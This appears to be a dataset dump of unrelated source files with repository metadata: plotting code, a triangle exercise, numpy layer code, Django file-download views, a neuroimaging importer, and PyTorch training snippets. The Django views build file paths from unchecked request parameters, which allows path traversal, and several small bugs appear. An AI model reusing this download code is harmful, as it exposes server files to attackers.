plt.plot(hw0_7, hwa_7, '-.', marker='v', color='b', linewidth=2.0)
plt.xlabel(r'$\mathrm{\hbar\omega\ (MeV)}$', fontsize=14)
plt.ylabel(r'$\mathrm{\hbar\widetilde{\omega}\ (MeV)}$', fontsize=14)
annotation_string = r'$\mathrm{^{15}N,^{15}O}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.25, 0.75), xycoords='axes fraction')
annotation_string = r'$\mathrm{^{21}N,^{21}O}$'
plt.annotate(annotation_string, fontsize=12, xy=(0.50, 0.25), xycoords='axes fraction')
ax4.legend(bbox_to_anchor=(0.325,0.975), frameon=False, fontsize=11)
#ax.xaxis.set_major_locator(majorLocatorX)
#ax.xaxis.set_minor_locator(minorLocatorX)
#ax.yaxis.set_major_locator(majorLocatorY)
#ax.yaxis.set_minor_locator(minorLocatorY)
plt.tight_layout()
plt.savefig('EOM-CoM.pdf', format='pdf', bbox_inches='tight')
plt.show()
| 0 | 0 | 0 |
40fe5bd1f5ac1196ee4058078bdcb72613172419 | 388 | py | Python | exercicios/PycharmProjects/exepython/ex042.py | Ojhowribeiro/PythonProjects | a058c0e090a7b96714bbd942c5c03664e4f3744f | [
"MIT"
] | null | null | null | exercicios/PycharmProjects/exepython/ex042.py | Ojhowribeiro/PythonProjects | a058c0e090a7b96714bbd942c5c03664e4f3744f | [
"MIT"
] | null | null | null | exercicios/PycharmProjects/exepython/ex042.py | Ojhowribeiro/PythonProjects | a058c0e090a7b96714bbd942c5c03664e4f3744f | [
"MIT"
] | null | null | null | r1 = float(input('Primeiro segmento: '))
r2 = float(input('segundo segmento: '))
r3 = float(input('terceiro segmento: '))
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:
print('É um triangulo:')
if r1 == r2 == r3:
print('Equilatero!')
elif r1 != r2 != r3 != r1:
print('Escaleno!')
else:
print('Isosceles!')
else:
print('Nao é um triangulo') | 27.714286 | 50 | 0.556701 | r1 = float(input('Primeiro segmento: '))
r2 = float(input('segundo segmento: '))
r3 = float(input('terceiro segmento: '))
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:
print('É um triangulo:')
if r1 == r2 == r3:
print('Equilatero!')
elif r1 != r2 != r3 != r1:
print('Escaleno!')
else:
print('Isosceles!')
else:
print('Nao é um triangulo') | 0 | 0 | 0 |
781de0ee0a125c78df965d3af5495763cc850f0a | 5,227 | py | Python | assignments/assignment2/layers.py | NadyaStrogankova/dlcourse_ai | d03e3123b9f801fa3d801ab08e7327df5d48be43 | [
"MIT"
] | null | null | null | assignments/assignment2/layers.py | NadyaStrogankova/dlcourse_ai | d03e3123b9f801fa3d801ab08e7327df5d48be43 | [
"MIT"
] | null | null | null | assignments/assignment2/layers.py | NadyaStrogankova/dlcourse_ai | d03e3123b9f801fa3d801ab08e7327df5d48be43 | [
"MIT"
] | null | null | null | import numpy as np
def l2_regularization(W, reg_strength):
"""
Computes L2 regularization loss on weights and its gradient
Arguments:
W, np array - weights
reg_strength - float value
Returns:
loss, single value - l2 regularization loss
gradient, np.array same shape as W - gradient of weight by l2 loss
"""
# print(W.shape)
loss = reg_strength * (W ** 2).sum()
grad = 2 * reg_strength * W
return loss, grad
def softmax_with_cross_entropy(predictions, target_index):
"""
Computes softmax and cross-entropy loss for model predictions,
including the gradient
Arguments:
predictions, np array, shape is either (N) or (batch_size, N) -
classifier output
target_index: np array of int, shape is (1) or (batch_size) -
index of the true class for given sample(s)
Returns:
loss, single value - cross-entropy loss
dprediction, np array same shape as predictions - gradient of predictions by loss value
"""
sm = softmax(predictions)
# print("softmax count", softmax, e, "sum", sum(e).sum())
# Your final implementation shouldn't have any loops
target, ti = targets(target_index, predictions.shape)
loss = np.mean(-np.log(sm[ti]))
dpredictions = (sm - target) / sm.shape[0]
# print("predictions", predictions, "softmax", sm, "target", target, "loss", loss, "grad", dpredictions)
return loss, dpredictions.reshape(predictions.shape)
class Param:
"""
Trainable parameter of the model
Captures both parameter value and the gradient
"""
def softmax(predictions):
'''
Computes probabilities from scores
Arguments:
predictions, np array, shape is either (N) or (batch_size, N) -
classifier output
Returns:
probs, np array of the same shape as predictions -
probability for every class, 0..1
'''
if predictions.ndim > 1:
pred_scaled = predictions.T - predictions.max(axis=1)
e = np.exp(pred_scaled)
sm = (e / e.sum(axis=0)).T
else:
pred_scaled = predictions - np.max(predictions)
e = np.exp(pred_scaled)
sm = np.array(e / sum(e))
# print(np.array(sm))
# Your final implementation shouldn't have any loops
return sm
| 30.213873 | 109 | 0.619476 | import numpy as np
def l2_regularization(W, reg_strength):
"""
Computes L2 regularization loss on weights and its gradient
Arguments:
W, np array - weights
reg_strength - float value
Returns:
loss, single value - l2 regularization loss
gradient, np.array same shape as W - gradient of weight by l2 loss
"""
# print(W.shape)
loss = reg_strength * (W ** 2).sum()
grad = 2 * reg_strength * W
return loss, grad
def softmax_with_cross_entropy(predictions, target_index):
"""
Computes softmax and cross-entropy loss for model predictions,
including the gradient
Arguments:
predictions, np array, shape is either (N) or (batch_size, N) -
classifier output
target_index: np array of int, shape is (1) or (batch_size) -
index of the true class for given sample(s)
Returns:
loss, single value - cross-entropy loss
dprediction, np array same shape as predictions - gradient of predictions by loss value
"""
sm = softmax(predictions)
# print("softmax count", softmax, e, "sum", sum(e).sum())
# Your final implementation shouldn't have any loops
target, ti = targets(target_index, predictions.shape)
loss = np.mean(-np.log(sm[ti]))
dpredictions = (sm - target) / sm.shape[0]
# print("predictions", predictions, "softmax", sm, "target", target, "loss", loss, "grad", dpredictions)
return loss, dpredictions.reshape(predictions.shape)
class Param:
"""
Trainable parameter of the model
Captures both parameter value and the gradient
"""
def __init__(self, value):
self.value = value
self.grad = np.zeros_like(value)
class ReLULayer:
def __init__(self):
self.param = None
def forward(self, X):
X_next = np.maximum(X, 0)
self.param = Param(X_next)
# Hint: you'll need to save some information about X
# to use it later in the backward pass
# raise Exception("Not implemented!")
return X_next
def backward(self, d_out):
"""
Backward pass
Arguments:
d_out, np array (batch_size, num_features) - gradient
of loss function with respect to output
Returns:
d_result: np array (batch_size, num_features) - gradient
with respect to input
"""
d_result = d_out
d_result[self.param.value == 0] = 0
self.grad = d_result
# print("backward", d_result, self.param.value)
# Your final implementation shouldn't have any loops
# raise Exception("Not implemented!")
return d_result
def params(self):
# ReLU Doesn't have any parameters
return {}
class FullyConnectedLayer:
def __init__(self, n_input, n_output):
self.W = Param(0.001 * np.random.randn(n_input, n_output))
self.B = Param(0.001 * np.random.randn(1, n_output))
self.X = None
def forward(self, X):
# print(self.W.value, self.B)
X_next = X.dot(self.W.value) + self.B.value
# print("shapes", X_next.shape, self.W.value.shape, X)
self.param = Param(X_next)
self.X = Param(X)
return X_next
# Your final implementation shouldn't have any loops
def backward(self, d_out):
"""
Backward pass
Computes gradient with respect to input and
accumulates gradients within self.W and self.B
Arguments:
d_out, np array (batch_size, n_output) - gradient
of loss function with respect to output
Returns:
d_result: np array (batch_size, n_input) - gradient
with respect to input
"""
# print(d_out, self.W.value.T)
d_input = d_out.dot(self.W.value.T)
self.grad = d_input
# Compute both gradient with respect to input
# and gradients with respect to W and B
# Add gradients of W and B to their `grad` attribute
self.params()['W'].grad = self.X.value.T.dot(d_out)
self.params()['B'].grad = np.ones((1, d_out.shape[0])).dot(d_out)
# print(d_out.shape, self.params()['B'].grad.shape)
# It should be pretty similar to linear classifier from
# the previous assignment
return d_input
def params(self):
return {'W': self.W, 'B': self.B}
def softmax(predictions):
'''
Computes probabilities from scores
Arguments:
predictions, np array, shape is either (N) or (batch_size, N) -
classifier output
Returns:
probs, np array of the same shape as predictions -
probability for every class, 0..1
'''
if predictions.ndim > 1:
pred_scaled = predictions.T - predictions.max(axis=1)
e = np.exp(pred_scaled)
sm = (e / e.sum(axis=0)).T
else:
pred_scaled = predictions - np.max(predictions)
e = np.exp(pred_scaled)
sm = np.array(e / sum(e))
# print(np.array(sm))
# Your final implementation shouldn't have any loops
return sm
def targets(target_index, shape):
target = np.zeros(shape)
ti = np.arange(len(target_index)), target_index.ravel()
target[ti] = 1
return target, ti
| 1,044 | 1,785 | 96 |
15695184dfd4802255290df2638fee74c61572f8 | 6,494 | py | Python | noteshrinker/views.py | rejgan318/noteshrinker-django | 65d32b8c15133bbf37104ba152710b6818ddc573 | [
"MIT"
] | 165 | 2016-09-29T01:32:44.000Z | 2022-03-10T22:36:40.000Z | noteshrinker/views.py | rejgan318/noteshrinker-django | 65d32b8c15133bbf37104ba152710b6818ddc573 | [
"MIT"
] | 8 | 2016-10-26T05:47:17.000Z | 2021-06-27T13:36:25.000Z | noteshrinker/views.py | rejgan318/noteshrinker-django | 65d32b8c15133bbf37104ba152710b6818ddc573 | [
"MIT"
] | 30 | 2016-10-23T23:47:08.000Z | 2021-12-26T11:11:03.000Z | import json
import os
import random
import string
import zipfile
from django.conf import settings
from django.http import Http404, JsonResponse, HttpResponseBadRequest
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.http import require_POST, require_GET
from django.views.generic import CreateView, DeleteView, ListView
from .models import Picture
from .noteshrink_module import AttrDict, notescan_main
from .response import JSONResponse, response_mimetype
from .serialize import serialize
@require_GET
# TODO: 1. Сделать чтобы сохранялись загруженные файлы по сессии - Make uploaded files save between session using session key
# DONE: 2. Удалять сразу не разрешенные файлы - не загружаются - Don't upload from file extensions
# TODO: 3. Проверять отсутсвующие параметры в shrink - Check for missing params in shrink
# DONE: 4. Проверять, существуют ли папки PNG_ROOT и PDF_ROOT - создавать если нет - Check for PNG_ROOT and PDF_ROOT
# TODO: 5. Проверять максимальную длину названий файлов - Check for maximum filename length
# DONE: 6. Сделать кнопку для резета - Make a reset button
# DONE: 7. Сделать view для загрузки ZIP-архива картинок - Make a zip-archive download view
# DONE: 8. Кнопка очистить очищает список загруженных файлов в window, деактивирует кнопку скачать - Clear button must clear window._uploadedFiles, deactivates download button
@require_POST
| 42.168831 | 175 | 0.695873 | import json
import os
import random
import string
import zipfile
from django.conf import settings
from django.http import Http404, JsonResponse, HttpResponseBadRequest
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.http import require_POST, require_GET
from django.views.generic import CreateView, DeleteView, ListView
from .models import Picture
from .noteshrink_module import AttrDict, notescan_main
from .response import JSONResponse, response_mimetype
from .serialize import serialize
def random_string(N):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(N))
@require_GET
def download_pdf(request):
filename = request.GET['filename']
file_path = os.path.join(settings.PDF_ROOT, filename)
if os.path.exists(file_path):
with open(file_path, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="application/pdf")
response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path) + ".pdf"
return response
else:
return HttpResponseBadRequest()
def download_zip(request):
images = request.GET.getlist('images')
compression = zipfile.ZIP_DEFLATED
image_prefix = images[0][:images[0].find('_')]
zipfile_name = os.path.join(settings.PNG_ROOT, 'noteshrinker_' + image_prefix + '_' + str(len(images)) + '.zip')
zf = zipfile.ZipFile(zipfile_name, mode='w', compression=compression)
for filename in images:
file_path = os.path.join(settings.PNG_ROOT, filename)
if os.path.exists(file_path):
zf.write(file_path, arcname=filename)
else:
return HttpResponseBadRequest
zf.close()
with open(zipfile_name, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="application/x-zip-compressed")
response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(zipfile_name)
return response
def index(request):
return render(request, 'index.html')
# TODO: 1. Сделать чтобы сохранялись загруженные файлы по сессии - Make uploaded files save between session using session key
# DONE: 2. Удалять сразу не разрешенные файлы - не загружаются - Don't upload from file extensions
# TODO: 3. Проверять отсутсвующие параметры в shrink - Check for missing params in shrink
# DONE: 4. Проверять, существуют ли папки PNG_ROOT и PDF_ROOT - создавать если нет - Check for PNG_ROOT and PDF_ROOT
# TODO: 5. Проверять максимальную длину названий файлов - Check for maximum filename length
# DONE: 6. Сделать кнопку для резета - Make a reset button
# DONE: 7. Сделать view для загрузки ZIP-архива картинок - Make a zip-archive download view
# DONE: 8. Кнопка очистить очищает список загруженных файлов в window, деактивирует кнопку скачать - Clear button must clear window._uploadedFiles, deactivates download button
@require_POST
def shrink(request):
files = request.POST.getlist('files[]')
existing_files = []
for i in files:
path = os.path.join(settings.MEDIA_ROOT, 'pictures', i)
if os.path.exists(path):
existing_files.append(path)
if len(existing_files) == 0:
return Http404
on_off = lambda x: True if x == 'on' else False
try:
num_colors = int(request.POST['num_colors'])
sample_fraction = float(request.POST['sample_fraction']) * 0.01
sat_threshold = float(request.POST['sat_threshold'])
value_threshold = float(request.POST['value_threshold'])
except ValueError as e:
return HttpResponseBadRequest(str(e))
if request.POST['pdfname'].find('.pdf') == -1:
pdfname = random_string(settings.RANDOM_STRING_LEN) + "_" + request.POST['pdfname'] + '.pdf'
else:
pdfname = random_string(settings.RANDOM_STRING_LEN) + "_" + request.POST['pdfname']
basename = random_string(settings.RANDOM_STRING_LEN) + "_" + request.POST['basename']
options = {
"basename": basename, # базовое название для картинки
"filenames": existing_files, # массив путей к файлам
"global_palette": on_off(request.POST['global_palette']), # одна палитра для всех картинок
"num_colors": num_colors, # цветов на выходе
"pdf_cmd": 'convert %i %o', # команда для пдф
"pdfname": os.path.join(settings.PDF_ROOT, pdfname), # название выходного пдф файла
"postprocess_cmd": None,
"postprocess_ext": '_post.png', # название после процессинга (?)
"quiet": False, # сократить выдачу
"sample_fraction": sample_fraction, # пикселей брать за образец в %
"sat_threshold": sat_threshold, # насыщенность фона
"saturate": True, # насыщать
"sort_numerically": on_off(request.POST['sort_numerically']), # оставить порядок следования
"value_threshold": value_threshold, # пороговое значение фона
"white_bg": on_off(request.POST['white_bg']), # белый фон
"picture_folder": settings.PNG_ROOT # куда сохранять картинки
}
pngs, pdf = notescan_main(AttrDict(options))
return JsonResponse({"pngs": pngs, "pdf": pdfname})
class PictureCreateView(CreateView):
model = Picture
fields = "__all__"
template_name = 'index.html'
def form_valid(self, form):
self.object = form.save()
files = [serialize(self.object)]
data = {'files': files}
response = JSONResponse(data, mimetype=response_mimetype(self.request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
def form_invalid(self, form):
data = json.dumps(form.errors)
return HttpResponse(content=data, status=400, content_type='application/json')
class PictureDeleteView(DeleteView):
model = Picture
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.delete()
response = JSONResponse(True, mimetype=response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
class PictureListView(ListView):
model = Picture
def render_to_response(self, context, **response_kwargs):
files = [serialize(p) for p in self.get_queryset()]
data = {'files': files}
response = JSONResponse(data, mimetype=response_mimetype(self.request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
| 4,896 | 265 | 182 |
6340455722a0e233ef3782030c5cda6f4f9191ee | 3,304 | py | Python | cortex/fmriprep.py | alebel14/pycortex | c8d75b3108cb981fde88f7ebb70592bd3f69a3ea | [
"BSD-2-Clause"
] | 1 | 2020-09-30T02:11:27.000Z | 2020-09-30T02:11:27.000Z | cortex/fmriprep.py | alebel14/pycortex | c8d75b3108cb981fde88f7ebb70592bd3f69a3ea | [
"BSD-2-Clause"
] | null | null | null | cortex/fmriprep.py | alebel14/pycortex | c8d75b3108cb981fde88f7ebb70592bd3f69a3ea | [
"BSD-2-Clause"
] | 1 | 2019-03-04T02:45:59.000Z | 2019-03-04T02:45:59.000Z | from . import database
import os.path as op
import shutil
from .freesurfer import parse_curv
import numpy as np
def import_subj(subject,
source_dir,
session=None,
sname=None):
"""Imports a subject from fmriprep-output.
See https://fmriprep.readthedocs.io/en/stable/
Parameters
----------
subject : string
Fmriprep subject name (without "sub-")
source_dir : string
Local directory that contains both fmriprep and freesurfer subfolders
session : string, optional
BIDS session that contains the anatomical data (leave to default if
not a specific session)
sname : string, optional
Pycortex subject name (These variable names should be changed). By default uses
the same name as the freesurfer subject.
"""
if sname is None:
sname = subject
database.db.make_subj(sname)
surfs = op.join(database.default_filestore, sname, "surfaces", "{name}_{hemi}.gii")
anats = op.join(database.default_filestore, sname, "anatomicals", "{name}.nii.gz")
surfinfo = op.join(database.default_filestore, sname, "surface-info", "{name}.npz")
fmriprep_dir = op.join(source_dir, 'fmriprep')
if session is not None:
fmriprep_dir = op.join(fmriprep_dir, 'ses-{session}')
session_str = '_ses-{session}'.format(session=session)
else:
session_str = ''
# import anatomical data
fmriprep_dir = op.join(fmriprep_dir, 'sub-{subject}', 'anat')
t1w = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_preproc.nii.gz')
aseg = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_label-aseg_roi.nii.gz')
for fmp_fn, out_fn in zip([t1w.format(subject=subject, session_str=session_str),
aseg.format(subject=subject, session_str=session_str)],
[anats.format(name='raw'),
anats.format(name='aseg')]):
shutil.copy(fmp_fn, out_fn)
#import surfaces
fmpsurf = op.join(fmriprep_dir,
'sub-{subject}{session_str}_T1w_').format(subject=subject,
session_str=session_str)
fmpsurf = fmpsurf + '{fmpname}.{fmphemi}.surf.gii'
for fmpname, name in zip(['smoothwm', 'pial', 'midthickness', 'inflated'],
['wm', 'pia', 'fiducial', 'inflated']):
for fmphemi, hemi in zip(['L', 'R'],
['lh', 'rh']):
source = fmpsurf.format(fmpname=fmpname,
fmphemi=fmphemi)
target = str(surfs.format(subj=sname, name=name, hemi=hemi))
shutil.copy(source, target)
#import surfinfo
curvs = op.join(source_dir,
'freesurfer',
'sub-{subject}',
'surf',
'{hemi}.{info}')
for curv, info in dict(sulc="sulcaldepth", thickness="thickness", curv="curvature").items():
lh, rh = [parse_curv(curvs.format(hemi=hemi, info=curv, subject=subject)) for hemi in ['lh', 'rh']]
np.savez(surfinfo.format(subj=sname, name=info), left=-lh, right=-rh)
database.db = database.Database()
| 38.870588 | 107 | 0.58414 | from . import database
import os.path as op
import shutil
from .freesurfer import parse_curv
import numpy as np
def import_subj(subject,
source_dir,
session=None,
sname=None):
"""Imports a subject from fmriprep-output.
See https://fmriprep.readthedocs.io/en/stable/
Parameters
----------
subject : string
Fmriprep subject name (without "sub-")
source_dir : string
Local directory that contains both fmriprep and freesurfer subfolders
session : string, optional
BIDS session that contains the anatomical data (leave to default if
not a specific session)
sname : string, optional
Pycortex subject name (These variable names should be changed). By default uses
the same name as the freesurfer subject.
"""
if sname is None:
sname = subject
database.db.make_subj(sname)
surfs = op.join(database.default_filestore, sname, "surfaces", "{name}_{hemi}.gii")
anats = op.join(database.default_filestore, sname, "anatomicals", "{name}.nii.gz")
surfinfo = op.join(database.default_filestore, sname, "surface-info", "{name}.npz")
fmriprep_dir = op.join(source_dir, 'fmriprep')
if session is not None:
fmriprep_dir = op.join(fmriprep_dir, 'ses-{session}')
session_str = '_ses-{session}'.format(session=session)
else:
session_str = ''
# import anatomical data
fmriprep_dir = op.join(fmriprep_dir, 'sub-{subject}', 'anat')
t1w = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_preproc.nii.gz')
aseg = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_label-aseg_roi.nii.gz')
for fmp_fn, out_fn in zip([t1w.format(subject=subject, session_str=session_str),
aseg.format(subject=subject, session_str=session_str)],
[anats.format(name='raw'),
anats.format(name='aseg')]):
shutil.copy(fmp_fn, out_fn)
#import surfaces
fmpsurf = op.join(fmriprep_dir,
'sub-{subject}{session_str}_T1w_').format(subject=subject,
session_str=session_str)
fmpsurf = fmpsurf + '{fmpname}.{fmphemi}.surf.gii'
for fmpname, name in zip(['smoothwm', 'pial', 'midthickness', 'inflated'],
['wm', 'pia', 'fiducial', 'inflated']):
for fmphemi, hemi in zip(['L', 'R'],
['lh', 'rh']):
source = fmpsurf.format(fmpname=fmpname,
fmphemi=fmphemi)
target = str(surfs.format(subj=sname, name=name, hemi=hemi))
shutil.copy(source, target)
#import surfinfo
curvs = op.join(source_dir,
'freesurfer',
'sub-{subject}',
'surf',
'{hemi}.{info}')
for curv, info in dict(sulc="sulcaldepth", thickness="thickness", curv="curvature").items():
lh, rh = [parse_curv(curvs.format(hemi=hemi, info=curv, subject=subject)) for hemi in ['lh', 'rh']]
np.savez(surfinfo.format(subj=sname, name=info), left=-lh, right=-rh)
database.db = database.Database()
| 0 | 0 | 0 |
02ddb609928a9cb820ef7a22bc662c645b8fa8ed | 1,218 | py | Python | radix/__init__.py | otetard/py-radix | df062a57c8bd6aaafd7f76e16ce4abe5dfbd4b8a | [
"BSD-4-Clause-UC"
] | null | null | null | radix/__init__.py | otetard/py-radix | df062a57c8bd6aaafd7f76e16ce4abe5dfbd4b8a | [
"BSD-4-Clause-UC"
] | null | null | null | radix/__init__.py | otetard/py-radix | df062a57c8bd6aaafd7f76e16ce4abe5dfbd4b8a | [
"BSD-4-Clause-UC"
] | 1 | 2022-03-02T20:26:15.000Z | 2022-03-02T20:26:15.000Z | try:
from ._radix import Radix as _Radix
except Exception as e:
from .radix import Radix as _Radix
__version__ = '1.0.0'
__all__ = ['Radix']
# This acts as an entrypoint to the underlying object (be it a C
# extension or pure python representation, pickle files will work)
| 30.45 | 66 | 0.646141 | try:
from ._radix import Radix as _Radix
except Exception as e:
from .radix import Radix as _Radix
__version__ = '1.0.0'
__all__ = ['Radix']
# This acts as an entrypoint to the underlying object (be it a C
# extension or pure python representation, pickle files will work)
class Radix(object):
def __init__(self):
self._radix = _Radix()
self.add = self._radix.add
self.delete = self._radix.delete
self.search_exact = self._radix.search_exact
self.search_best = self._radix.search_best
self.search_worst = self._radix.search_worst
self.search_covered = self._radix.search_covered
self.search_covering = self._radix.search_covering
self.nodes = self._radix.nodes
self.prefixes = self._radix.prefixes
def __iter__(self):
for elt in self._radix:
yield elt
def __getstate__(self):
return [(elt.prefix, elt.data) for elt in self]
def __setstate__(self, state):
for prefix, data in state:
node = self._radix.add(prefix)
for key in data:
node.data[key] = data[key]
def __reduce__(self):
return (Radix, (), self.__getstate__())
| 779 | -1 | 156 |
d4f18ce0ff738c966f1e237beffc9da366e3ae64 | 2,521 | py | Python | python/paddle/hapi/logger.py | TingquanGao/Paddle | 9b1015d90b4d498ab58df7cff2c3ed27863ce970 | [
"Apache-2.0"
] | 10 | 2021-05-12T07:20:32.000Z | 2022-03-04T08:21:56.000Z | python/paddle/hapi/logger.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 1 | 2021-01-25T09:40:19.000Z | 2021-01-25T09:40:19.000Z | python/paddle/hapi/logger.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 25 | 2019-12-07T02:14:14.000Z | 2021-12-30T06:16:30.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import logging
from paddle.fluid.dygraph.parallel import ParallelEnv
def setup_logger(output=None, name="hapi", log_level=logging.INFO):
"""
Initialize logger of hapi and set its verbosity level to "INFO".
Args:
output (str): a file name or a directory to save log. If None, will not save log file.
If ends with ".txt" or ".log", assumed to be a file name.
Otherwise, logs will be saved to `output/log.txt`.
name (str): the root module name of this logger. Default: 'hapi'.
log_level (enum): log level. eg.'INFO', 'DEBUG', 'ERROR'. Default: logging.INFO.
Returns:
logging.Logger: a logger
"""
logger = logging.getLogger(name)
logger.propagate = False
logger.setLevel(log_level)
format_str = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
# stdout logging: only local rank==0
local_rank = ParallelEnv().local_rank
if local_rank == 0 and len(logger.handlers) == 0:
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(log_level)
ch.setFormatter(logging.Formatter(format_str))
logger.addHandler(ch)
# file logging if output is not None: all workers
if output is not None:
if output.endswith(".txt") or output.endswith(".log"):
filename = output
else:
filename = os.path.join(output, "log.txt")
if local_rank > 0:
filename = filename + ".rank{}".format(local_rank)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
fh = logging.StreamHandler(filename)
fh.setLevel(log_level)
fh.setFormatter(logging.Formatter(format_str))
logger.addHandler(fh)
return logger
| 35.013889 | 94 | 0.678302 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import logging
from paddle.fluid.dygraph.parallel import ParallelEnv
def setup_logger(output=None, name="hapi", log_level=logging.INFO):
"""
Initialize logger of hapi and set its verbosity level to "INFO".
Args:
output (str): a file name or a directory to save log. If None, will not save log file.
If ends with ".txt" or ".log", assumed to be a file name.
Otherwise, logs will be saved to `output/log.txt`.
name (str): the root module name of this logger. Default: 'hapi'.
log_level (enum): log level. eg.'INFO', 'DEBUG', 'ERROR'. Default: logging.INFO.
Returns:
logging.Logger: a logger
"""
logger = logging.getLogger(name)
logger.propagate = False
logger.setLevel(log_level)
format_str = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
# stdout logging: only local rank==0
local_rank = ParallelEnv().local_rank
if local_rank == 0 and len(logger.handlers) == 0:
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(log_level)
ch.setFormatter(logging.Formatter(format_str))
logger.addHandler(ch)
# file logging if output is not None: all workers
if output is not None:
if output.endswith(".txt") or output.endswith(".log"):
filename = output
else:
filename = os.path.join(output, "log.txt")
if local_rank > 0:
filename = filename + ".rank{}".format(local_rank)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
fh = logging.StreamHandler(filename)
fh.setLevel(log_level)
fh.setFormatter(logging.Formatter(format_str))
logger.addHandler(fh)
return logger
| 0 | 0 | 0 |
810f92db062fdf62ffd23425e50d565e2ea12589 | 10,919 | py | Python | pytorch/torch_train.py | LianShuaiLong/Codebook | fd67440d2de80b48aa90b9f7ea5d459baee0a6d8 | [
"MIT"
] | null | null | null | pytorch/torch_train.py | LianShuaiLong/Codebook | fd67440d2de80b48aa90b9f7ea5d459baee0a6d8 | [
"MIT"
] | null | null | null | pytorch/torch_train.py | LianShuaiLong/Codebook | fd67440d2de80b48aa90b9f7ea5d459baee0a6d8 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import numpy as np
#********************模型训练*******************************#
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(),lr=learning_rate)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = model.to(device)
for epoch in range(train_epochs):
for i,(images,labels) in enumerate(train_loader):
images = images.cuda()
labels = labels.cuda()
outs = model(images)
loss = criterion(outs,labels)
# 根据pytorch中backward()函数的计算,
# 当网络参量进行反馈时,梯度是累积计算而不是被替换,
# 但在处理每一个batch时并不需要与其他batch的梯度混合起来累积计算,
# 因此需要对每个batch调用一遍zero_grad()将参数梯度置0.
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch:{epoch},Loss:{loss.item()}...')
#********************模型测试************************#
model.eval() #对于bn和drop_out 起作用
with torch.no_grad():
correct = 0
total = 0
for images,labels in test_loader:
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
pred = torch.argmax(outputs,1).item()
correct+= (torch.argmax(outputs,1)==labels).sum().cpu().data.numpy()
total += len(images)
print(f'acc:{correct/total:.3f}')
#****************自定义loss*************************#
#***************标签平滑,有很强的聚类效果???****************************#
# https://zhuanlan.zhihu.com/p/302843504 label smoothing 分析
# 写一个label_smoothing.py 的文件,然后再训练代码里面引用,用LSR代替交叉熵损失即可
import torch
import torch.nn as nn
# timm 库中有现成的接口
# PyTorchImageModels
# from timm.loss import LabelSmoothingCrossEntrophy
# from timm.loss import SoftTargetCrossEntrophy
# criterion = LabelSmoothingCrossEntrophy(smoothing=config.MODEL.LABEL_SMOOTHING)
# criterion = SoftTargetCrossEntrophy()
# 或者直接再训练过程中进行标签平滑
for images, labels in train_loader:
images, labels = images.cuda(), labels.cuda()
N = labels.size(0)
# C is the number of classes.
smoothed_labels = torch.full(size=(N, C), fill_value=0.1 / (C - 1)).cuda()
smoothed_labels.scatter_(dim=1, index=torch.unsqueeze(labels, dim=1), value=0.9)
score = model(images)
log_prob = torch.nn.functional.log_softmax(score, dim=1)
loss = -torch.sum(log_prob * smoothed_labels) / N
optimizer.zero_grad()
loss.backward()
optimizer.step()
#******************************Mixup训练,数据增强的一种方式***********************************#
# mixup采用对不同类别之间进行建模的方式实现数据增强,而通用数据增强方法则是针对同一类做变换。(经验风险最小->邻域风险最小),提升对抗样本及噪声样本的鲁棒性
# 思路非常简单:
# 从训练样本中随机抽取两个样本进行简单的随机加权求和,对于标签,相当于加权后的样本有两个label
# 求loss的时候,对两个label的loss进行加权,在反向求导更新参数。
# https://zhuanlan.zhihu.com/p/345224408
# distributions包含可参数化的概率分布和采样函数
# timm库有现成接口
# from timm.data import Mixup
# mixup_fn = Mixup(
# mixup_alpha=0.8,
# cutmix_alpha=1.0,
# cutmix_minmax=None,
# prob=1.0,
# switch_prob=0.5,
# mode='batch',
# label_smoothing=0.1,
# num_classes=1000)
